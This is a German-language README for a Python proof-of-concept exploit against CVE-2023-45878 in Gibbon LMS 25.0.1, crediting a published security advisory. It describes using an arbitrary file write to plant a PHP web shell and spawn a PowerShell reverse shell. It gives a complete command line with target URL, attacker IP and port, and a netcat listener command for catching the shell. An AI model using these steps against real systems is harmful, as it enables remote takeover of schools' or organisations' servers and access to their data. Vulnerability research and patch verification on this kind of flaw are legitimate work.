
Python-Exploit für CVE-2023-45878, der Gibbon LMS 25.0.1 angreift. Nutzt beliebiges Dateischreiben, um eine PHP-Web-Shell hochzuladen und eine PowerShell-Reverse-Shell für den Fernzugriff auszuführen.
Dieses Skript wurde auf Basis der Arbeit von https://herolab.usd.de/security-advisories/usd-2023-0025/ erstellt. Der Exploit nutzt einen Arbitrary File Write Exploit in Gibbon LMS 25.0.1 aus. Dieser PoC lädt ein einfaches PHP-CMD-Skript hoch und verwendet es, um eine PowerShell-Reverse-Shell zu laden.
python3 CVE-2023-45878.py -u http://target.com/Gibbon-LMS -l 10.10.16.2 -p 8888 -f asdf
Flags:
-u, URL, unter der Gibbon LMS installiert ist.
-l, Ihre IP
-p, Ihr offener Port
-f, Dateiname. Wichtig, wenn Sie manuell testen müssen. Standard ist "asdf".
Halten Sie einen Listener für die eingehende Shell bereit.
nc -lvnp 8888